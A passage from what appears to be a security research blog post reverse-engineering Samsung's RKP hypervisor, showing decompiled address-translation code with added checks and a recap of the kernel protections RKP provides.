. Weird, but at least it does the job. We also noticed that they added some extra checks in rkp_get_pa
(better be safe than sorry!):
int64_t rkp_get_pa(uint64_t vaddr) {
// ...
if (!vaddr)
return 0;
if (vaddr < 0xFFFFFFC000000000) {
paddr = virt_to_phys_el1(vaddr);
if (!paddr) {
if ((vaddr & 0x4000000000) != 0)
paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
else
paddr = vaddr - KIMAGE_VOFFSET;
}
} else {
paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
}
check_kernel_input(paddr);
if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
}
return paddr;
}
Let's recap the various protections offered by Samsung RKP:

- sensitive kernel global variables (such as ss_initialized) are moved to the .rodata region (read-only);
- sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages because of the modifications made by Samsung to the SLUB allocator;
- extensive checks are performed whenever credentials are assigned, so an attacker cannot simply overwrite the cred field of a task_struct to elevate privileges.
With this deep dive into RKP, we have seen that a security hypervisor can help against kernel exploitation, like other defense-in-depth mechanisms, by making the task harder for an attacker who has gained read-write access in the kernel. But this great engineering work doesn't prevent mistakes in the implementation.
There are a lot more things about RKP that we did not mention here but that would deserve a follow up blog post: unpatched vulnerabilities that we cannot talk about yet, explaining in more detail the differences between Exynos and Snapdragon implementations, digging into the new framework and features of the S20, etc.